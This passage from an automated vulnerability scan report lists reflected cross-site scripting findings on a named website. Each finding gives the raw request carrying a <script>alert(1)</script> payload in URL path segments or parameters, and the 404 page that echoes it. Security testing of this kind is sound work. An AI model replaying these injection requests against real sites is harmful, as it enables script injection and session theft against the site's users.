Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating7ddeb<script>alert(1)</script>11f63f5a680/ was not found on this server.</p>
...[SNIP]...

2.3390. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ad6a<script>alert(1)</script>c8192ace741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/?1ad6a<script>alert(1)</script>c8192ace741=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/?1ad6a<script>alert(1)</script>c8192ace741=1 was not found on this server.</p>
...[SNIP]...

2.3391. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cf09b<script>alert(1)</script>f06a6178c3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcf09b<script>alert(1)</script>f06a6178c3c/5/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcf09b<script>alert(1)</script>f06a6178c3c/5/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3392. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4501<script>alert(1)</script>96e7568c4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5e4501<script>alert(1)</script>96e7568c4f1/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5e4501<script>alert(1)</script>96e7568c4f1/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3393. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70128<script>alert(1)</script>e4b69112ed2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes70128<script>alert(1)</script>e4b69112ed2/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes70128<script>alert(1)</script>e4b69112ed2/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3394. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 913d4<script>alert(1)</script>0610dd3d95a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos913d4<script>alert(1)</script>0610dd3d95a/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos913d4<script>alert(1)</script>0610dd3d95a/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3395. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 71b71<script>alert(1)</script>14bbeef47ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images71b71<script>alert(1)</script>14bbeef47ca/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images71b71<script>alert(1)</script>14bbeef47ca/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3396. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f0de<script>alert(1)</script>a00d587521e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating2f0de<script>alert(1)</script>a00d587521e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating2f0de<script>alert(1)</script>a00d587521e/4half.gif was not found on this server.</p>
...[SNIP]...

2.3397. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b7cea<script>alert(1)</script>20f783830dd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/4half.gifb7cea<script>alert(1)</script>20f783830dd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/4half.gifb7cea<script>alert(1)</script>20f783830dd was not found on this server.</p>
...[SNIP]...

2.3398. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20138<script>alert(1)</script>93bc67fb58e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/4half.gif?20138<script>alert(1)</script>93bc67fb58e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/4half.gif?20138<script>alert(1)</script>93bc67fb58e=1 was not found on this server.</p>
...[SNIP]...

2.3399. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e5be<script>alert(1)</script>be6e9e12263 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6e5be<script>alert(1)</script>be6e9e12263/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6e5be<script>alert(1)</script>be6e9e12263/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3400. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2988<script>alert(1)</script>645ee2e450e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5a2988<script>alert(1)</script>645ee2e450e/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5a2988<script>alert(1)</script>645ee2e450e/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3401. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a32f7<script>alert(1)</script>a84a9a29feb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesa32f7<script>alert(1)</script>a84a9a29feb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesa32f7<script>alert(1)</script>a84a9a29feb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3402. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac74b<script>alert(1)</script>a4f0247c2b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosac74b<script>alert(1)</script>a4f0247c2b3/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosac74b<script>alert(1)</script>a4f0247c2b3/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3403. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8346c<script>alert(1)</script>619c74e2f3e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images8346c<script>alert(1)</script>619c74e2f3e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images8346c<script>alert(1)</script>619c74e2f3e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3404. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4e28f<script>alert(1)</script>5cb3e2d552a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating4e28f<script>alert(1)</script>5cb3e2d552a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating4e28f<script>alert(1)</script>5cb3e2d552a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3405. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92d1a<script>alert(1)</script>d6c1220694e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/search.php92d1a<script>alert(1)</script>d6c1220694e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php92d1a<script>alert(1)</script>d6c1220694e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3406. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3e377<a>c254484757e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e377<a>c254484757e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e377<a>c254484757e&opt=2 was not found on this server.</p>
...[SNIP]...

2.3407. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6789d<a>1818c608f12 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...6789d<a>1818c608f12&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
